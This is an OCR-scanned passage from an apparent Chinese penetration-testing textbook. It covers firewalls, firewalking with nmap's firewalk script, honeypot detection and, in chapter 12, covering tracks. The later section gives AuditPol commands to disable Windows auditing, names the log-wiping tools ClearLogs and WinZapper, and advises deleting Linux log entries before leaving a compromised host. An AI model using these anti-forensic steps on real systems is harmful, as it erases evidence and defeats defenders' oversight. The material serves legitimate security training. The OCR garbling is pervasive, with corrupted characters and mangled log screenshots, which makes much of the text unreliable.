该 类 别 的 防火 墙 严 密 检查 流量 并 分 析 应 用 程序 信息 ， 以 判定 是 否 传 输 数 据 包 。 该 类 防火 
墙 的 一 个 常见 子 类 是 基于 代理 的 解决 方案 ， 在 请 求 传 输 数据 包 时 要 求 验证 。 此 外 ， 内 容 缓存 
代理 可 通过 缓存 经 常 访问 的 信息 ， 而 不 需要 再 次 同 服 务 器 请 求 相同 的 旧 数 据 ， 优 化 性 能 。 


有 状态 的 多 层 检 测 防火 墙 (Stateful Multilayer Inspection Firewalls) 

此 类 防火 墙 通过 组 合 其 他 三 种 防火 墙 的 功能 进行 运作 。 它 们 在 网 络 层 过 滤 数 据 包 ， 以 
确定 会 话 数 据 包 是 否 合法 一 一 这 意味 着 如 果 在 网 络 内 部 建立 一 个 连接 ， 该 连接 应 从 不 受信 
任 的 网 络 返回 应 答 一 一 并 且 防 火 墙 在 应 用 层 上 评估 数据 包 的 内 容 。 通 过 有 状态 的 包 过 滤 ， 
克服 了 由 于 包 过 滤 防 火 墙 仅 检查 数据 包 的 报头 就 允许 数据 包 通 过 的 缺陷 。 


11.4.3 了 解 目 标 


现在 将 使 用 之 前 学 过 的 一 项 技能 ; 器 口 扫描 (有 关 详 细 信息 ， 请 参阅 第 6 章 “扫描 和 枚 
举 ”)。 使 用 问 口 扫描 ， 可 以 更 清楚 地 了 解 防火 场 ， 判 断 哪些 闯 口 是 开放 的 ， 还 有 可 能 根据 
获取 的 信息 确定 防火 场 的 品牌 和 型 号 。 一 些 供应 商 默认 将 茶 些 端口 开放 ， 作 为 识别 防火 场 
技术 存在 的 一 种 方法 ， 用 于 帮助 审计 ， 或 者 吓 阻 一 名 发 现 了 开放 端口 的 潜在 攻击 者 。 

当然 ， 只 有 一 个 开放 的 端口 是 不 够 的 ， 还 必须 使 用 第 6 章 中 提 到 的 其 他 技能 : banner 
抓 取 。 如 果 发 现 防火 场 开 司 了 腊 弟 端口 ， 并 对 其 进行 研究 (以 确保 它们 不 是 其 他 不 了 解 的 
工作 )， 请 尝试 抓 取 一 个 banner 并 查看 收 到 的 信息 。 


第 11 章 “应 对 安防 和 检测 系统 有 


11.4.4 ”防火 墙 上 “ 蹈 火 ” 


知道 防火 墙 品牌 只 是 攻击 的 一 部 分 ， 理 解 其 配置 是 差别 很 大 的 男 一 回 事 。 可 以 通过 称 
为 “ 蹈 火 ”(firewalking) 的 过 程 获得 这 些 规则 的 配置 。“ 足 火 ” 是 测试 和 识别 特定 防火 墙 
规则 和 配置 的 过 程 。 该 过 程 使 用 一 系列 探测 、 扫 描 和 数据 包 人 处理 等 步骤 ， 逐 一 判断 防火 墙 
对 其 的 反应 。 在 完成 该 过 程 后 ， 可 以 获得 相当 准确 的 防火 墙 配 置 。 

要 对 防火 墙 执行 “ 蹈 火 ”探测 ， 需 要 以 下 三 个 组 件 。 

瞄准 主机 (Targeting Host) 

瞄准 主机 是 目标 网 络 之 外 的 系统 ， 数 据 包 从 瞄准 主机 发 送 到 目的 主机 ， 以 获得 有 关 目 
标 网 络 的 更 多 信息 。 


网 天 主机 
网 关 主 机 是 目标 网 络 上 连接 到 Intemet 的 系统 ， 数 据 包 到 达 目 标 网 络 的 路 径 须 通过 该 系统 。 


目标 主机 
目标 主机 是 目标 网 络 上 数据 包 的 目的 系统 。 它 通常 是 承载 防火 墙 应 用 程序 或 角色 的 
系统 。 


在 完成 了 “ 蹈 火 ” 之 后 ， 如 果 泪 运 的 话 ， 应 该 可 以 得 到 相当 多 有 关 防 火 墙 如 何 运 作 的 


可 以 使 用 在 第 6 章 中 讨论 的 工具 之 一 ，hnmap， 执 行 “ 蹈 火 ” 行 动 。nmap 恰 好 包括 一 个 
同样 名 为 firewalk 的 脚本 。 那 么 该 过 程 如 何 工 作 ? 

要 确定 给 定 网 关上 的 规则 ， 扫 描 仪 将 一 个 探 针 数据 包 发 送 给 网 关 后 面 的 测试 点 ， 并 将 
探 针 的 生存 时 间 (TTL) 设 置 为 比 网 关 高 1。 如 果 探 针 由 网 关 转 发 ， 则 可 预期 接收 到 由 网 关 的 
下 一 跳 路 由 器 处 发 出 的 ICMP TIME EXCEEDED 应 答 ， 或 者 如 果 测 试点 直接 连接 到 网 关 
时 ， 则 可 以 收 到 由 度量 自身 发 出 的 该 应 答 ， 否 则 ， 探 针 将 超时 。 

该 脚本 以 等 于 目标 距离 的 TTL 开 始 发 送 数 据 包 。 如 果 探 针 发 送 超 时 ， 则 将 TTL 值 减 1 
并 重新 发 送 。 如 果 获 得 ICMP TIME EXCEEDED 回 复 ， 则 扫描 结束 。 

脚本 将 探测 所 有 使 用 no-reply 过 滤 的 TCP 和 UDP 端口 。 对 于 UDP 扫描 而 言 ， 如 果 许 多 
端口 被 靠近 扫描 仪 的 网 关 阻 塞 ， 则 扫描 过 程 可 能 相当 慢 。 


firewalk 脚 本 参数 列表 

firewalk.max-probed-ports 每 种 协议 探测 的 最 大 端口 数量 。 将 该 值 设 置 为 -1 以 扫描 所 
有 过 滤 的 端口 。 

firewalk.max-retries 允许 的 最 大 重 传 次 数 。 

firewalk.recv-timeout 数据 包 捕 获 循环 的 持续 时 间 ( 以 毫秒 为 单位 )。 

firewalk.max-active-probes 最 大 并 行 活跃 探 针 数量 。 

firewalk.probe-timeout 探 针 有 效 期 (以 宣 秒 为 单位 )。 


0 参 画 渡 式 入 | 实战 


使 用 示例 


nmap -script=firewalk --traceroute < 主机 > 


nmap -script=firewalk -traceroute -script-args=firewalk.max—-retries=1 
< 主机 > 
nmap -script=firewalk 一 -traceroute -script-args=firewalk.probe-— 


timeout=400ms < 主机 > 

nmap -script=firewalk -traceroute -script-args=firewalk.max-probed-— 
ports=7 < 主机 > 

那么 ， 在 获得 防火 墙 如 何 设置 和 有 何 防御 措施 的 相关 信息 后 ， 应 如 何 攻 击 该 设备 ?以 
下 是 几 种 可 有 助 于 对 付 该 设备 的 攻击 。 


网 络 钓鱼 

这 种 类 型 的 攻击 使 用 电子 邮件 ， 以 使 客户 端 在 不 知 不 觉 中 泄露 密码 ， 或 诱 使 他 们 点 击 
可 下 载 和 安装 恶意 软件 的 链接 。 下 一 氮 功 夫 ， 攻 击 者 即 可 构建 一 个 看 似 非常 可 信 的 电子 邮 
件 ， 可 以 诱 使 受害 者 点 击 下 载 条 些 内 容 的 链接 ， 或 强行 让 受害 者 跳 转 到 候 思 他 们 透露 目 己 
信息 的 网 站 。 防 火 墙 无 法 抵御 网 络 钓 鱼 攻 击 ， 因 为 此 类 攻击 通过 电子 邮件 传播 ， 并 诱导 用 
户 上 自行 泄露 信息 。 


暴露 的 服务 器 

暴露 在 互联 网 上 的 Web 服 务 器 、 邮 件 服务 器 和 应 用 程序 服务 器 可 能 易于 被 黑客 入 侵 和 
攻击 。 虽 然 实际 上 这 似乎 显而易见 ， 但 仍 能 见 到 这 种 将 服务 器 部 署 在 未 受 某 种 级 别 的 防 
火 墙 或 其 他 技术 保护 的 位 置 上 的 情况 时 有 发 生 。 理 想 情况 下 ， 需 要 连接 到 Intemet 或 面向 
Intemet 的 服务 器 应 放置 在 夹 在 两 个 防火 墙 之 间 的 边界 网 络 中 。 


骏 露 的 各 户 端 

漫游 客 尸 端 如 笔记 本 电脑 、 平 板 电 脑 和 手机 等 ， 意 味 者 一 个 可 能 有 效用 作 网 络 入 口 
扩 的 机 会 目标 。 攻 击 者 可 以 渗透 保护 薄弱 的 客户 问 设 备 ， 然 后 使 用 该 设备 渗透 网 络 ， 从 而 
实现 直接 攻击 防火 场 更 好 的 攻击 效果 。 考 谍 到 普通 用 户 可 能 不 会 采取 最 佳 的 防御 手段 或 做 
法 保护 他 们 的 系统 ， 从 而 导致 弱化 的 安全 势 态 和 可 能 被 利用 的 淤 在 漏洞 。 如 果 这 些 客户 没 
有 得 到 充分 的 保护 ， 或 者 用 户 目 身 判别 能 力 较 兰 ， 下 载 了 恶意 文件 或 受 恶 意 代码 侵蚀 的 软 
件 ， 那 么 防火 墙 就 几乎 无 防御 性 可 言 。 


防火 墙 漏洞 

防火 场 本 质 上 是 软件 ， 和 所 有 的 软件 一 样 ， 它 们 也 可 能 有 缺陷 和 漏洞 。 多 年 来 ， 软 件 
中 发 现 了 许多 看 似 简单 的 漏洞 ， 它 们 导致 了 巨大 的 安全 问题 。 利 用 蹈 火 技 术 、 问 口 扫 描 和 
漏洞 扫描 ， 通 过 研究 和 努力 ， 有 可 能 发 现 一 些 缺 陷 。 如 果 条 件 成 熟 ， 你 也 可 能 会 发 现 可 以 
利用 的 漏洞 。 
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复杂 性 

无 论 硬件 还 是 软件 ， 防 火场 都 是 一 种 复杂 而 精细 的 撤 术 。 需 要 大 量 的 培训 和 经 验 ， 才 
能 充分 理解 如 何 设 置 通常 基于 人 硬件 或 软件 的 防火 墙 ， 使 之 配置 正确 、 运 行 恨 好 。 确 保 达 到 
理想 安全 性 的 最 佳 方法 是 让 与 这 些 设 备 相关 的 操作 人 员 获 得 经 验 和 培训 ， 并 确保 对 系统 执 
行 审计 ， 以 保证 防火 墙 配 置 得 当 。 


网 络 安全 周 责 (Network Security Perimeter) 
茶 些 网 络 可 能 具有 从 商业 网 络 到 其 他 网 络 的 未 受 保 护 的 路 径 。 亚 意 或 无 知 的 用 户 可 能 
会 安装 一 个 未 授权 接 入 点 ， 使 入 侵 者 能 够 轻易 地 绕 过 防火 墙 ， 通 过 后 门 进入 网 络 。 


网 络 摆渡 (Sneakernet) 

携带 CD、U 盘 甚至 笔记 本 电脑 ， 通 过 物理 边界 和 网 络 安全 边界 (传递 信息 ) 可 能 会 将 工 
业 网 络 暴 露 于 恶意 代码 之 上 。 这 些 攻 击 可 能 是 由 对 企业 不 满 或 者 是 缺乏 训练 或 遭受 欺骗 的 
内 部 人 士 所 造成 的 。 


拒绝 服务 
在 东 些 情况 下 ， 可 能 能 够 使 用 一 次 强力 的 传统 拒绝 服务 攻击 压制 防火 场 。 在 这 种 情况 
下 ， 有 可 能 会 击 震 设 备 并 导致 其 失效 ， 从 而 允许 流量 通过 。 


11.5 使 用 密 钠 : 披 着 羊 及 的 狼 


攻击 将 遇 到 更 有 趣 的 系统 之 一 是 蜜 钠 (Honeypot)。 密 锡 是 一 种 用 于 吸引 和 捕获 试图 获 
取 访 问 权 的 攻击 者 的 设备 或 系统 。 它 们 也 被 用 作 研 究 工 具 、 诱 饵 和 单纯 获取 信息 的 工具 。 


基于 密 饶 的 部 闭 方 式 ， 可 以 假定 与 蜜 缸 的 任何 交互 都 不 是 善意 的 。 密 缸 并 非 都 相同 ， 
它 主要 分 为 两 大 类 : 
低 交 互 密 钠 


此 类 蜜 馈 依 赖 于 对 易 受 攻击 的 系统 上 服务 和 程序 的 模拟 。 如 果 受 到 攻击 ， 系 统 将 检测 
到 该 活动 并 抛 出 一 个 错误 ， 管 理 员 可 对 该 错误 进行 审核 。 


高 交互 密 包 

此 类 蜜 镀 比 低 交 互 蜜 负 更 复杂 ， 因 为 它们 模拟 的 并 非 单个 似乎 易 受 攻击 的 系统 ， 而 是 
模拟 整个 网 络 (通常 称 为 蜜 网 )。 蜜 负 将 报告 在 这 个 严格 控制 和 监测 的 环境 中 发 生 的 任何 活 
动 。 此 类 配置 与 低 交互 蜜 负 的 另 一 个 区 别 是 ， 它 使 用 的 是 实际 系统 上 的 实际 应 用 ， 而 不 
是 模拟 系统 。 
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11.5.1 检测 密 钒 


窄 挫 是 一 种 网 络 设备 ， 正 在 越 来 越 多 地 部 车 到 网 络 环境 中 ， 作 为 检测 和 迟 清 系 统 攻击 
的 一 种 手段 。 由 于 密 抽 应 用 已 经 十 分 普 遇 ， 因 此 需要 知道 可 用 于 检测 此 类 系统 的 方法 。 


常见 疑点 

许多 蜜 色 可 以 简单 地 通过 查找 特定 版 本 产品 的 特征 标志 检测 。 例 如 ， 对 于 某 些 蜜 镶 ， 
端口 扫描 或 开放 端口 上 的 banner 抓 取 ， 将 显示 该 系统 的 独 有 特征 。 其 他 系统 可 能 具有 表明 
它们 可 能 是 蜜 缸 的 特有 端口 或 banner 的 信息 。 

为 应 对 这 种 情况 ， 许 多 供应 商 发 布 其 产品 的 多 个 版 本 ， 或 通知 其 用 户 如 何 进 行 更 改 以 
防止 被 检 出 。 


欺骗 尊 口 
欺骗 端口 是 条 些 蜜 馈 特 有 的 一 种 有 趣 功 能 。 欺 骗 端 口 是 设置 在 蜜 色 上 ， 供 外 界 识别 其 


吴 份 之 物 。 其 骗 问 口 将 在 扫描 和 banner 抓 取 时 ， 将 目 身 标识 为 一 个 蜜 掺 ， 以 期 吓 退 看 到 此 
信息 的 攻击 者 。 


空城 计 

在 某 些 情况 下 ， 可 能 很 容易 识别 出 低 交 互 密 抽 ， 因 为 它 不 能 像 高 交互 系统 一 样 模拟 一 
个 完整 环境 。 探 测 低 交互 密 负 的 攻击 者 可 能 会 很 快 发 现 ， 自 己 在 与 一 个 没有 多 少 用 户 、 服 
务 以 及 其 他 内 容 ， 基 本 上 只 有 一 个 shell 的 系统 进行 交互 。 


11.5.2 ”密友 的 问题 


在 此 和 希望 说 明 的 一 个 问题 是 使 用 蜜 缸 的 合法 性 。 多 年 来 ， 曾 多 次 有 人 询问 笔者 ， 在 网 
络 上 设置 一 种 设计 目的 就 是 让 黑客 来 攻击 的 设备 是 否 合法 。 具 体 来 说 ， 如 果 有 人 攻击 你 在 
目 己 网 络 上 设置 的 蜜 铅 ， 即 使 在 蜜 铅 由 你 主动 设置 的 前 提 下 ， 可 以 认为 他 们 的 行为 是 非法 
的 吗 ? 其 答案 似乎 是 肯定 的 ， 这 是 非法 的 。 

这 一 合法 性 问题 ， 本 质 上 是 陷 人 入 菲 与 诱 人 犯法 的 问题 。 是 否 属于 前 者 ， 即 陷 人 入 
徘 ， 问 题 在 于 是 人 否 实际 上 促使 茶 人 实施 了 某 些 他 本 不 会 实施 的 违法 行为 。 而 族人 犯法 的 例 
子 ， 问 题 在 于 是 人 否 只 是 客观 上 提供 了 攻击 机 会 ， 而 攻击 者 主动 选择 了 进一步 去 攻击 。 在 大 
多 数 情况 下 ， 判 定 密 缸 不 属于 陷 人 入 徘 ， 因 此 如 果 有 人 攻击 了 和 它 ， 可 能 会 被 起 诉 。 

当然 ， 笔 者 不 是 律师 ， 所 以 在 进行 涉及 使 用 蜜 缸 的 调查 之 前 ， 请 查阅 当地 法 律 并 咨询 
律师 。 
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11.6 ”本 痘 小 结 


IDS 可 用 于 检测 可 疑 行为 和 提示 存在 攻击 的 行为 。NIDS 和 HIDS 可 以 检测 出 不 应 该 发 
生 的 ， 或 与 已 知 的 异常 相 匹配 的 行为 ， 并 回 适 当 的 网 络 管理 人 员 发 送 警报 。 而 比 IDS 更 进 
一 步 的 IPS， 甚 至 可 以 在 导致 更 大 的 问题 之 前 ， 检 测 、 发 出 警报 并 阻止 攻击 。 

本 章 还 学 习 了 可 以 搭建 防火 墙 ， 内 外 网 络 之 间 的 有 效 屏障 。 防 火 墙 有 几 种 类 型 和 形 
式 ， 但 每 种 防火 墙 都 提供 了 管制 进出 网 络 流量 的 手段 。 

最 后 ， 本 书 介 绍 了 蜜 色 ， 以 及 它们 如 何 作为 诱饵 ， 将 攻击 流量 引 离 更 有 价值 的 资产 。 
密 缸 设计 用 于 模拟 真实 系统 ， 以 延缓 或 阻止 攻击 者 进一步 入 侵 网 络 。 


11.7 


何谓 防火 墙 ? 

. 使 用 NIDS 有 何 好 处 ? 

. 预计 HIDS 能 够 发 现 何 种 类 型 的 网 络 活动 ? 
. 何谓 蜜 钠 ? 

. 基于 知识 的 NIDS 有 何 缺 点 ? 

. 何谓 DMZ? 


到 目前 为 止 , 我 们 已 经 完成 了 相当 多 的 工作 ,但 现在 该 到 清理 烂摊子 ， 把 事情 理 顺 的 时 候 
了 。 之 前 所 采取 的 行动 和 使 用 的 应 用 程序 很 容易 在 系统 上 诸 留 证 据 ， 可 用 于 揭露 在 系统 中 的 破 
坏 活动 。 我 们 在 此 期 望 确保 的 是 ， 四 处 络 视 、 探 索 的 过 程 和 滥 留 的 痕迹 不 致 引起 怀疑 ， 且 行动 
保持 秘密 和 隐 项 尽 可 能 长 的 时 间 一 一 至 少 到 与 客户 会 面 并 提交 渗透 测试 结果 报告 时 为 止 。 


本 章 将 学 习 : 
清除 证 据 的 必要 性 
删除 日 志文 件 中 的 事件 
清除 和 删除 事件 

隐藏 文件 

使 用 隐 写 术 


og 


12.1 “认识 规避 动机 


规避 检测 的 常见 问题 之 一 是 : 为 什么 要 应 用 规避 和 对 抗 检测 机 制 这 样 一 套 复杂 的 流 
程 ? 显而易见 的 理由 是 ， 在 使 用 前 文摘 述 的 方法 成 功 控 制 系统 后 ， 应 个 用 为 此 担忧。 

隐藏 踪迹 并 清理 痕迹 的 重要 性 至 少 体现 在 两 个 方面 : 

@ 首 抑 ， 尽 可 能 长 时 间 地 规避 检测 非常 重要 ， 因 为 这 样 可 以 启 得 实施 攻击 的 时 间 。 

可 以 如 此 设想 : 如 果 受 害 者 在 攻击 发 生 之 后 检查 攻击 现场 ， 却 没有 发 现任 何 明显 
表示 曾经 发 生 过 攻击 的 证 据 ， 他 们 可 能 不 会 继续 进行 详细 检查 。 反 之 ， 如 果 他 们 
在 现场 发 现 不 合适 或 者 不 太 正 常 的 迹象 ， 就 非 第 可 能 会 执行 进一步 的 检查 ， 从 而 
很 可 能 发 现 并 阻止 攻击 。 

@ 测试 完成 后 ， 需 要 确保 没有 在 受害 者 的 系统 中 遗留 任何 痕迹 。 记 录 下 所 做 的 一 切 
工作 ， 并 在 测试 完成 之 后 删除 或 撤销 曾 做 过 的 更 改 非常 重要 。 一 切 遗 留 都 可 能 对 
客户 构成 潜在 危险 ; 遗留 物 可 能 会 使 系统 处 于 不 安全 的 状态 。 

单 从 这 两 点 吕 可 以 看 出 ， 遗 留 痕迹 将 不 仅 导 致 系统 处 于 糟糕 的 状态 ， 也 会 削弱 渗 透 测 
试 的 效果 。 删 除 或 更 改 诸如 日 志文 件 、 配 置 更 改 、 软 件 以 及 其 他 任何 相关 项 目 是 非常 重要 
并 且 绝 对 不 可 忽视 的 。 当然 ， 如 果 无 法 清除 ， 通 稼 还 可 以 进行 隐藏 ， 如 果 硕 望 隐藏 木马 
或 其 他 类 似 的 软件 项 目 ， 这 种 方法 十 分 有 效 。 从 攻击 者 的 角度 来 看 ， 不 被 发 现 是 一 件 求 之 
不 得 的 好 事 ， 但 是 从 防守 者 的 角度 来 看 ， 则 要 不 惜 一 切 代价 去 避免 这 种 情况 发 生 。 
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12.2 ”请 除 日 志文 件 


对 安全 审核 员 、 安 全 管理 员 以 及 IT 人 员 而 言 ， 日 志文 件 是 最 重要 的 工具 之 一 。 应 当 定 
期 审查 日 志文 件 ， 以 及 时 发 现 恶 意 活动 或 可 能 提示 不 良 行为 的 事件 DD。 可 以 用 人 工 或 专用 
的 日 志 分 析 软 件 审 查 这 些 日 志 ， 并 报告 异常 行为 或 活动 。 

日 志文 件 中 可 能 出 现 的 事件 包括 : 

@ 尝试 登录 失败 
更 改 文件 
使 用 特权 
系统 重启 
安装 软件 
尝试 登录 成 功 
清除 日 志文 件 
更 改 或 删除 重要 的 系统 文件 
安装 应 用 程序 
应 用 程序 故障 与 朋 满 

在 现实 中 ， 取 决 于 所 发 生 的 活动 类 型 以 及 系统 所 有 者 选择 进行 日 志 记 录 的 项 目 ， 可 能 
在 系统 的 日 志文 件 中 出 现 不 同 的 事件 。 例如 ， 如 果 入 侵 者 尝试 通过 反复 登录 获取 账户 的 
密码 ， 系 统 将 锁定 该 账户 。 通 常 本 地 系统 或 域 会 记录 此 类 的 活动 。 但 是 ， 如 果 入 侵 者 将 
数据 复制 到 闪存 驱动 器 ， 对 于 操作 系统 而 言 ， 该 活动 和 日 党 使 用 别 无 两 样 。 如 果 未 将 系 
统 或 网 络 配置 为 记录 对 特定 文件 或 目录 的 访问 ， 那 么 它 将 不 过 是 一 条 成 功 访 问答 试 的 审核 
记录 。 一 个 典型 的 Windows 事 件 日 志 如 图 12.1 所 示 。 


|_Type 
|@ Suceess Audt él15/2001 5:25:27 pM 
orcess Audt 6l15/200| 5:25:23PM Securt 
| uccess Audt 6li5j200l 5:25:22 PM 
| Secoss Audk 6ll512001 5:25:22 pM 
| ceess Audt 1512001 5:25:22 PHM 
gj uccess Audt 611512001 5:25:21 PM 
oj uccess Audt 1512001 52520 | 
| @ uceess Audt 6J15/200! 5:25:03 PM 
部 Success Audt 6l15/200! 5:25;03 PM 
全 Success Audt 6J15/200l 5:25:03 PM 
of Success Audt 6/15/2001 5:25:00PM 
| 于 Suceess Audt 115/2001 5:25:00PM 
| 车 Success Audt 6l15/2001 5:25:00PM 
] of Success Audt 6f15/2001 5:25:00 PM 
@ Success Audt 6/15/2001 5:24:59 PM 
oers Audt 6l15/200l 5:24:59 PM 8 
| uccess Aude 611512001 5:24:57PM 
¢ , 


12.1 Windows 安 全 事件 日 志 
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还 应 谨 记 的 是 ， 虽 然 并 非 所 有 的 活动 都 可 能 被 系统 记录 ， 但 是 日 志 在 检测 安全 变更 、 
调查 事件 、 执 行 影 啊 分 析 以 及 针对 入 侵 采 取 行 动 等 方面 是 非常 有 用 的 。 另外 ， 一 个 配置 
民 好 的 审核 系统 可 以 用 于 威慑 滥用 现象 。 最 后 ， 从 记录 事件 消耗 的 便 盘 空间 、 内 存 和 处 
理 器 等 系统 资源 考 碟 ， 记 录 系 统 上 的 每 个 事件 是 不 可 取 的 。 


12.2.1 禁用 Windows 中 的 日 志 记 录 过 程 


处 理 遗 留 痕迹 的 最 佳 方法 之 一 是 : 一 开始 就 不 要 ， 或 者 尽 可 能 少 地 遗留 痕迹 。 实 现 这 
个 目的 的 方法 之 一 就 是 暂时 禁用 日 志 记 录 。 

在 Windows 系 统 中 ， 可 以 禁用 系统 上 的 日 志 记 录 / 审 核 功能 ， 并 阻止 活动 出 现在 日 志文 
件 中 。 在 禁用 审核 后 ， 攻 击 者 就 有 效 地 断绝 了 防御 者 的 一 个 重要 信息 来 源 ， 并 迫使 他 们 
采用 其 他 检测 机 制 。 

在 Windows 环 境 中 ， 可 以 在 命令 行 中 使 用 AuditPol 实 用 程序 与 系统 进行 交互 、 配 置 或 
更 改 审核 设置 。AuditPol 用 于 控制 和 修改 Windows 操 作 系 统 中 的 审核 设置 。 可 以 使 用 该 应 
用 程序 启用 或 禁用 本 地 和 远程 系统 上 的 安全 审核 。 

AuditPol 的 语法 通常 如 下 所 示 : 

auditpol \\< 有 目标 的 lp 地 址 > < 命令 名 > 

或 

auditpol < 命令 名 > 

AuditPol 可 用 于 调整 对 多 种 不 同安 全 事件 的 审核 标准 。 

在 Windows 中 ， 需 要 在 命令 提示 符 中 使 用 提升 的 权限 运行 该 命令 ， 或 者 提升 命令 提示 
从 本 号 的 权限 。 

玄 命 令 的 语法 很 简单 ;以 下 是 一 些 AuditPol 命 令 的 示例 。 

该 命令 将 列 出 所 有 审核 策略 设置 : 


Auditpol /get /category:* 

仅 列 出 “账户 管理 (Account Management)” 类 的 审核 策略 设置 : 
Auditpol /get /category:"Account Management" 

仅 列 出 “用 户 账 户 窟 理 (User Account Management)” 子 类 别 的 策略 设置 : 
Auditpol /get /subcategory:"User Account Management" 

将 “账户 管理 ”类 审核 策略 设置 为 “成 功 ”: 


Auditpol /set /category:"Account Management™" /success:enable 
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将 “账户 管理 ”类 审核 策略 设置 为 “失败 ”: 

Auditpol /set /category:"Account Management™" /failure:enable 
茶 用 或 删除 “账户 管理 ”类 审核 策略 的 “成 功 ” 设 置 : 

Auditpol /set /category:"Account Management™" /success:disable 

共用 或 删除 “账户 管理 ”类 审核 策略 的 “失败 ”设置 : 

Auditpol /set /category:"Account Manadement"” /failure:disable 

仅 将 子 策略 类 别 “用 户 账 户 管 理 ” 设 置 为 “成 功 ”: 

Auditpol /set /subcategory:"User Account Manadement" /success:enable 
仅 将 子 策略 类 别 “ 用 户 账 户 管理 ”设置 为 “失败 ”: 

Auditpol /set /subcategory:"User Account Management™" /failure:enable 
仅 列 出 用 户 Administrator 的 “详细 跟踪 (Detailed Tracking)” 类 策略 设置 : 
Auditpol /get /user:MAdministrator /category:"Detalled Tracking" 

仅 将 用 户 Administrator 的 “详细 跟踪 ”类 策略 设置 为 “成 功 ”: 


Auditpol /set /user:Administrator /category:"Detailed Tracking™" / 


success:enable 


12.2.2 ”删除 日 志文 件 中 的 事件 


通过 关闭 系统 日 志 删 除 整个 时 间 段 的 日 志 很 容易 引起 怀疑 ， 但 是 有 选择 性 地 从 日 志文 
件 中 删除 条 目 却 是 另 一 回 事 。 

有 很 多 方法 能 够 选择 性 地 修改 日 志文 件 ， 从 而 使 攻击 不 那么 明显 。 以 下 是 其 中 一 些 
工 具 * 

@ ClearLogs: www.ntsecurlty.nu/toolbox/clearlogs/。 

@ 使 用 WinZapper: www.ntsecurity.nu/toolbox/winzapper/， 可 从 安全 日 志 中 选择 性 地 

删除 事件 记录 ， 而 不 是 删除 所 有 内 容 。 

WinZapper 在 Windows 平 台 上 的 界面 如 图 12.2 所 示 。 

Log Parser Lizard 是 一 个 Windows 应 用 程序 ， 可 以 下 载 (免费 ) 并 安装 在 任何 Windows 系 
统 中 。 在 安装 该 工具 后 ， 不 仅 可 以 使 用 它 查 看 系统 上 的 日 志文 件 ， 还 可 以 构造 查询 以 查找 
特定 事件 (如 图 12.3 所 示 )。 但 是 ， 为 了 避免 污染 证 据 ， 我 们 不 建议 将 此 应 用 程序 安装 在 正 
在 调查 的 系统 中 。 
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WinZapper - http:/ /ntsecurity .ny Xx 
(Success us ThuFeb 1519%18:352007 Object Access NT AUTMORITYVSYSTEM SecurRyAu 
Grecess st ThuFeb 151918:35 2007 Object Access NT AUTMORAITYISYSTEM Secutyhs 
Sucess halt ThyFob151910352007 Object Aceess NT ALTHORITYISYSTEM Securtyh 
Success hit Thu Feb 1519%16:35 2007 Objpct Access NT AUTHORITYISYSTEM SecuRtyh 
Success uit Thu Feb 15 19:18:35 2007 Pokey hanos NT AUTHORITYISYSTEM 小 小 人 二- 
Sxcess hal ThuFeb 15 1 和 18:40 2007 Object Access NT AUTHORAITYISYSTEM Secuntyh 
Surcess udt ThuFeb 15 19%10:402007 Object Mccess NT AUTHORITYVSY5TEM Secutyh 
Sreess st ThuFeb 15 1%%10:402007 Object Acecess NT ALUTHMORITYISYSTEM SecurRyA 
Srcess ut ThyFeb1519%16:402007 -Pokey Chanoge NT AUTHORITYISYTSTEM ++++- 
Sxcess hit ThuFeb 151918:402007 Object Access NT AUTHORITYIVSY5TEM Secutyh 
Sxcess bak Thu Feb 15 1919:07 2007 Detaled Trading TESTWAdmaraest stor B55 Adma 
SA ThuFeb1519%19:092007 Priviege Use TESTWAdnreir 避 or Securky - 
Sxcess ht ThuFeb 15 19:19:09 2007 ”Detaled Troding TEST\Admrist stor 7% \WIiN 
Sgcess st Thu Feb 15 1 全 19:09 2007 Prviege se TESTVASmarist tor Secuky - 
Sxccess yt ThuFeb1519%19:11 2007 Prviege Use TESTAdmnist otor EventLog 
Scess st ThuFeb 15 19:19:15 2007 Detsled Tiedro TESTWAdmere 尼 Cr 79% Admw 
Srcess AR ThuFeb 15 19219:27 2007 Prviege Use TESTWAdmresi stor SecurRy - 
Sixcess AThuFeb 151919:50 2007 Prvisege Use TESTWAdnreiy tor SecurRky - 
Srcess Ar Thu Feb 15 19.19:50 2007 ”Detaled Trading TESTWAdmeretrakcr TR Prog 
Sxcess At ThuFeb 15 1919:50 2007 Priviege Use TESTWAdreresir 尼 Or SecurRy - 
Se it ThuFeb 151920:23 2007 ”Detaled Trading NT AUTHORITYVSYSTEM 784 TEST1 
Secess sh Thu Feb 15 1924:1]42007 Detailed Trackno TEST\Admrist stor YR Ad 
Sxcess ut ThuFeb1S19%24:222007 Prvieqe Use TEST\Admarist 以 Cr SecurRy - 
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图 1]12.3 Log Parser Lizard 


Log Parser Lizard 实 际 上 只 不 过 是 Microsoft Log Parser( 日 志 解 析 器 ) 程 序 的 一 个 图 形 界 
面 。Log Parser 是 一 个 多 功能 的 软件 ， 可 使 用 SQL 得 询 查 看 和 搜索 日 志文 件 。 该 程序 可 以 
搜索 所 有 类 型 的 日 志文 件 源 ， 包 括 基 于 文本 的 数据 ， 如 日 志文 件 、XML 文 件 和 TSV/CSV 
文本 文件 ， 以 及 Windows 操 作 系 统 中 的 关键 数据 源 ， 如 Windows 事 件 日 志 、IIS 日 志 、 注 册 
表 、 文 件 系统 、 活 动 目录 服务 等 。 
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那么 Linux 呢 ? 可 以 清除 Linux 中 的 日 志 吗 ? 当然 可 以 ， 下 面 就 将 介绍 相关 内 容 。 


12.2.3 ”清除 Linux 计 算 机 上 的 事件 日 志 


Linux 系 统 的 日 志文 件 存储 在 /var/log 目 录 中 。 可 以 使 用 任何 文本 编辑 器 (如 gedit) 打 开 
并 查看 包含 日 志 消息 的 明文 文件 : 


gedit /var/log/messages 


在 离开 攻陷 的 系统 之 前 ， 应 注意 打开 该 文件 并 删除 能 够 反映 攻击 活动 的 条 目 ， 如 果 
时 间 桑 迫 ， 则 可 删除 所 有 条 目 。 虽 然 删 除 单个 条 目 不 容 易 引 起 怀疑 ， 并 且 可 以 帮助 规避 防 
护 ， 删 除 所 有 条 目 更 为 有 效 ， 但 是 缺少 日 志文 件 这 种 异常 事件 足以 引起 注意 。 

在 使 用 在 此 列 出 的 任何 一 种 技术 时 ， 要 记 住 ， 作 为 善意 者 ， 这 样 做 可 能 会 破坏 你 行为 
的 证 据 或 文档 ， 而 这 些 证 据 和 文档 在 后 续 与 客户 的 讨论 中 可 能 用 到 。 而 一 个 坏人 (或 是 说 
不 怀 好 意 者 ) 如 果 选 择 删除 系统 中 的 日 志文 件 和 其 他 项 目 以 隐藏 行 迹 ， 他 可 能 会 发 现 目 己 
